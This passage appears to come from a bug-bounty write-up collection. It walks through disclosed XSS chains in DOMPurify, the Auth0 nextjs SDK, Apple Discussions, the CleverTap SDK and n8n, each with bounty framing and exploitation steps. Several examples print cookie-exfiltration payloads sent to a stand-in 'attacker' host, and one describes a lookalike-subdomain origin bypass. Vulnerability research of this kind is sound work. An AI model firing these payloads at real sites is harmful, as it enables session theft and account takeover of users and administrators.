• Disclosed source: https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565 (knadh, Jan 2 2026). Reported via listmonk's GitHub Security Advisories disclosure.

Example 2 — dompurify-mxss-nesting-bypass-stored-admin-context (mid five-figure direct + downstream consumers, mXSS family — CVE-2024-47875 NVD-verified)

• Setup: SaaS application uses DOMPurify 3.0.x to sanitize user-submitted comment HTML before storage. Sanitized content rendered on comment-list page, accessible to admins for moderation.
• Discovery: hunter checked target's package.json (exposed via /_next/static/.../package.json or SBOM endpoint), identified dompurify@3.0.5 (vulnerable per NVD CVE-2024-47875 — affects <3.1.3). Read the IcesFont nesting-based mXSS payload from cure53berlin's disclosed advisory at https://github.com/cure53/DOMPurify/security/advisories/GHSA-gx9m-whjm-85jf.
• Exploitation: Submitted comment with the verbatim nesting-based mXSS payload. DOMPurify sanitized the payload to "safe-looking" HTML; content stored in DB. When admin opened the comment-moderation page, the browser parsed the stored HTML in a slightly different context (innerHTML assignment on the moderation list); the deep-nested structure mutated into executable form, firing alert(document.domain) in admin browser. Pivoted to fetch admin session cookie via fetch('//attacker/'+document.cookie).
• Impact: Cross-user XSS via mXSS bypass of current-tier sanitizer. Affects every consumer of DOMPurify <3.1.3 in admin-content-rendering pattern. Direct payment from Cure53 / Snyk for the primitive demonstration; per-target bounty for each affected SaaS in mid four-figure to low five-figure tier.

Example 3 — auth0-nextjs-returnto-javascript-scheme-token-theft (low to mid five-figure bounty range, OAuth chain — CVE-2025-67716 NVD-verified)

• Setup: SaaS application uses @auth0/nextjs-auth0@4.10.0 for authentication. Login flow: user clicks "Login" → redirect to Auth0 → user authenticates → redirect back to /api/auth/callback?returnTo=<original_page>. SDK's login handler accepts returnTo parameter and uses it for post-auth redirect.
• Discovery: hunter checked target's package.json or JS bundle for Auth0 SDK version. Identified vulnerable version (>=4.9.0 and <4.13.0 per NVD CVE-2025-67716 advisory). Crafted attacker page with <a href="https://target/api/auth/login?returnTo=javascript:fetch('//attacker/'+document.cookie)">Click to login</a>.
• Exploitation: Victim clicked attacker link, completed normal Auth0 authentication, was redirected by SDK to location.href = "javascript:fetch('//attacker/'+document.cookie)". JavaScript scheme executed in target origin context, exfiltrating session cookie.
• Impact: 1-click ATO via OAuth returnTo XSS. Affects all Auth0 nextjs-auth0 consumers in the vulnerable version range. Disclosed by Joshua Rogers (@MegaManSec) via Okta's responsible disclosure.

Example 4 — apple-discussions-stored-xss-cross-mirror ($5,000 bounty, Apple Security Bounty — ZombieHack May-Jul 2025)

• Setup: discussions.apple.com community forum platform. Comment / thread fields with rich-content support. Content rendered across multiple Apple international mirrors and developer.apple.com/forums.
• Discovery: ZombieHack (Youssef Desouki) tested input fields on discussions.apple.com during routine review of Apple web assets. Found stored XSS in a previously unfiltered pathway (specific field not disclosed in writeup). Apple applied partial fix April 5 2025; ZombieHack identified bypass that re-enabled the vulnerability across international mirrors and developer.apple.com/forums.
• Exploitation: Submitted XSS payload, confirmed execution via screenshot showing alert(document.domain) firing on each mirror. URL manipulation triggered automatic execution without user interaction.
• Impact: Stored XSS in Apple developer forum context. Could exfil developer session cookies, access developer-only APIs, harvest enterprise certificate management UIs.

Example 5 — clevertap-postmessage-origin-includes-bypass-bank-session-xss (low five-figure bounty range on financial program, multi-origin chain — CleverTap issue #424 disclosed Jun 2025)

• Setup: Bank's web banking platform embeds CleverTap analytics chat widget at v1.15.2. Widget SDK listens for postMessage events; v1.15.2 added an origin check using .includes('clevertap.com') to validate sender. The event.data.display.details[0].html field is assigned to element.innerHTML in the SDK's renderCustomHtml function.
• Discovery: hunter audited the CleverTap web SDK source on GitHub (issue #424 by Mr-Neutr0n Jun 2025). Identified the .includes() origin check as bypassable via subdomain trick. Registered dashboard.clevertap.com.attacker.com (own domain attacker.com with subdomain). Confirmed .includes('clevertap.com') returns true for that origin.
• Exploitation: Crafted attacker page that embedded the bank's login page in an iframe, then sent a postMessage from dashboard.clevertap.com.attacker.com containing JSON with display.details[0].html = "<img src=x onerror=fetch('//attacker/'+document.cookie)>". CleverTap SDK received the message, passed origin check via .includes(), parsed JSON, assigned HTML to innerHTML — XSS executed in bank's authenticated session, exfiltrating session cookie.
• Impact: Cross-origin XSS in bank session via vendor SDK. Compromises any bank embedding the affected CleverTap version. Pattern repeats across other chat widgets with similar origin-check bugs (Drift, Crisp, Intercom historical versions).

Example 6 — n8n-mcp-oauth-client-name-admin-dialog-xss (low five-figure bounty range on workflow automation platforms — GHSA-537j-gqpc-p7fq)

• Setup: n8n exposes MCP OAuth client registration for workflow automation integrations. Admins review OAuth consent dialogs where attacker-supplied client_name renders in HTML.
• Discovery: researcher registered an MCP/OAuth client with HTML in client_name and observed that the authorization dialog rendered it without safe escaping in affected n8n versions.
• Exploitation: attacker sends admin a legitimate-looking MCP authorization URL. Admin opens consent dialog; crafted client_name executes JavaScript in the n8n admin origin before consent. Payload can read workflow credentials visible to the admin session or call workflow-management APIs as that admin.
